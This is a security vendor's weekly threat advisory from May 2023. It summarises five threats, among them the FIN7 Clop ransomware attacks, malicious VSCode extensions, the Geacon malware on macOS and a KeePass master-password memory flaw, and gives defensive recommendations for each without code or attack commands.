FIN7 hackers return with Clop ransomware attacks

SISA Weekly Threat Watch - 29 May 2023

The range of infection chains detected last week, along with highly advanced malware tools, leaves no doubt that threat groups are focusing on intensifying their operations. Whether it is newly emerged APT campaigns, malicious extensions stealing sensitive data, or an infamous cybercrime group reappearing with new wave of attacks, all demonstrate the rising sophistication of cyber threats. To maintain a strong defense posture, organizations require stringent access controls, robust endpoint security solutions, and constant user training.

SISA Weekly Threat Watch – our weekly feature brings to you a quick snapshot of all the major security vulnerabilities that posed a threat to organizations worldwide. These recurring actionable threat advisories will also provide information and recommendations that will help security teams take appropriate actions to defend against the latest and critical threats.

1. CommonMagic malware implants linked to new CloudWizard framework

An APT campaign leveraging the PowerMagic and CommonMagic implants has been uncovered by security experts. It utilizes a modular framework known as CloudWizard, which possesses the ability to capture screenshots, perform keylogging, and record audio using the device’s microphone. Furthermore, these campaigns target victims in shared locations.

One particularly alarming capability of the framework is its capacity to extract Gmail cookies from browser databases. This enables the attackers to gain unauthorized access to targeted Gmail accounts and subsequently exfiltrate data from those compromised accounts. To minimize the attack surface, organizations are advised to implement strict access controls and policies. It is also recommended to deploy comprehensive endpoint security solutions that include advanced threat detection, real-time monitoring, and behavior analysis capabilities and regularly update them to address vulnerabilities and ensure the latest security protections.

2. Notorious FIN7 returns with Clop ransomware in new wave of attacks

FIN7, a notorious financially motivated cybercrime group known for targeting the U.S. retail, restaurant and hospitality sectors emerged from a two-year hiatus to carry out opportunistic ransomware attacks last month. In the recent attacks, FIN7 attackers utilized the PowerShell-based POWERTRASH in-memory malware dropper to deploy the Lizar post-exploitation tool on compromised devices, allowing the threat actors to gain a foothold within the targeted network and move laterally to deploy Clop ransomware using OpenSSH and Impacket.

The group has been linked to attacks aimed at PaperCut printing servers with Bl00dy, LockBit, and Clop ransomware. It is recommended to employ Endpoint Detection and Response tools that detect multiple stages of the attack lifecycle to prevent execution of the malware. Additionally, review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts, audit user accounts with administrative privileges and configure access controls according to the principle of least privilege, to stay protected from such attacks.

3. Malicious Microsoft VSCode extensions steal passwords, open remote shells

Cybercriminals have started targeting the VSCode Marketplace, a platform where users can discover and download extensions to improve their coding experience. Researchers have uncovered that compromised extensions on the marketplace were downloaded by Windows developers a significant number of times. These malicious extensions granted unauthorized access to victim machines, allowing threat actors to steal credentials, gather system information, and establish a remote shell on the compromised machines.

Theme Dracula dark: It collected basic system information from developers’ machines, including details such as the hostname, operating system, CPU platform, total memory, and CPU information.

python-vscode: code analysis revealed its malicious intent as a C# shell injector, enabling the execution of code or commands on the victim’s machine.

prettiest java: it maliciously stole stored credentials or authentication tokens from various applications such as Discord, Discord Canary, Google Chrome, Opera, Brave, and Yandex.

Users are advised to remain vigilant while browsing and installing extensions from software repositories and install extensions only from trusted publishers. It is recommended to utilize security tools, such as antivirus software and browser extensions, that can help identify and block potentially malicious extensions or activities.

4. Hackers using Golang variant of Cobalt Strike to target Apple macOS systems

Geacon, an open-source alternative to Cobalt Strike, is becoming popular among cybercriminals as it enables attacks on macOS devices. On April 5, an AppleScript applet named “Xu Yiqing’s Resume_20230320.app” was uploaded to VirusTotal. This malicious script, when executed, establishes a connection with a remote server and proceeds to download a Geacon payload. In October 2022, researchers discovered two new iterations of Geacon known as geacon_plus and geacon_pro.

These additions to Geacon provide enhanced functionality and underscore the continuous efforts to develop advanced evasion techniques in the cybercriminal landscape. The core component of the Geacon payload establishes a connection with a command-and-control (C2) server located in Japan, enabling it to receive additional instructions and carry out malicious activities. To prevent data loss, it is recommended to employ a multi-layered defense strategy that combines various security measures, including network segmentation, strong access controls, endpoint protection, and network monitoring.

5. KeePass exploit allows attackers to recover master passwords from memory

KeePass is a free open-source password manager, which helps in managing passwords and in storing them in encrypted form. It encrypts the entire database, i.e., not only the passwords, but also usernames, URLs, notes, etc. The encrypted database can only be opened with the master password. However, a researcher has worked out a way to recover a master password and has posted PoC for KeePass 2.X Master Password Dumper on GitHub.

The post says that in KeePass 2.x before 2.54, it is possible to recover the cleartext master password from a memory dump, even when a workspace is locked or no longer running. Since memory dumps must be retrieved for the KeePass master password to be recovered, the exploitation of CVE-2023-32784 requires physical access or malware infection on the target machine. It is recommended to use KeePass with YubiKey to keep the password out of the text box so that it does not end up in the system memory. Turn on device encryption to keep unauthorized users from accessing the system.

To get daily updates on the critical vulnerabilities being exploited by threat actors, subscribe to SISA Daily Threat Watch – our daily actionable threat advisories.

For a deeper understanding of how you can prevent these threats from affecting your organization, request a call to get in touch with our experts.

SISA’s Latest
close slider